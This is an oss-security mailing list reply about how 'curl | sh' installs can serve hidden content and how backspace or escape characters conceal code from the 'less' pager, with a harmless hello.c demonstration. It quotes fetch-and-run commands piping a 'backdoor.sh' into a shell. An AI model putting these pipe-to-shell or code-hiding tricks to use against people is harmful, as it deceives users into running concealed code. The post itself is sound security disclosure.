Follow @Openwall on Twitter for new release announcements and other news
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Thu, 21 Apr 2016 21:45:59 +0200
From: Jakub Wilk <jwilk@...lk.net>
To: oss-security@...ts.openwall.com
Subject: Re: s/party/hack like it's 1999

* up201407890@...nos.dcc.fc.up.pt, 2015-09-17, 18:03:
>$ curl 127.0.0.1/backdoor.sh
>#!/bin/bash
>echo doing something very nice!
>
>$ wget -qO - 127.0.0.1/backdoor.sh
>#!/bin/bash
>echo doing something very nice!
>
>
>But if we pipe it into a shell...
>
>
>$ curl -s 127.0.0.1/backdoor.sh|sh
>doing something evil!
>
>$ wget -qO - 127.0.0.1/backdoor.sh|sh
>doing something evil!
>
>
>You might be thinking "If I opened that in my browser, I would detect 
>it being malicious!"
>Well, think again...
>One can have all sorts of fun with user-agents, something that can 
>easily come to mind is verifying if the user-agent is from curl or 
>wget,

...or this:
https://www.idontplaydarts.com/2016/04/detecting-curl-pipe-bash-server-side/

>'less' doesn't interpret escape sequences unless the -r switch is used, 
>so stop aliasing it to 'less -r' just because there's no colored 
>output.

As somebody else noted, it should be s/doesn't interpret/neutralizes/ or 
something. But that doesn't mean you should feel safe if you don't use 
-r.

For example, when git automatically spawns a pager, it puts R in the 
LESS environment variable. (That would be fine if git escaped \033 
before passing them to the pager, but it doesn't. Oddly, it does seem to 
escape other control characters.) Now, -R is less convenient than -r for 
hiding malicious code, but you could still set foreground and background 
to black in hope that the victim's terminal background is also black.

But even without -r or -R, one can use backspace characters to hide evil 
payload:

| $ less -FX hello.c
| #include <stdio.h>
| #include <stdlib.h>
|
| int main(int argc, char **argv)
| {
|         /* Copyright 2015-2016 Jakub Wilk */
|         printf("Hello world!\n");
|         return 0;
| }
|
| $ gcc -Wall hello.c -o hello && ./hello
|  ________
| < ^H^H^H >
|  --------
|         \   ^__^
|          \  (oo)\_______
|             (__)\       )\/\
|                 ||----w |
|                 ||     ||

-- 
Jakub Wilk

View attachment "hello.c" of type "text/x-csrc" (229 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.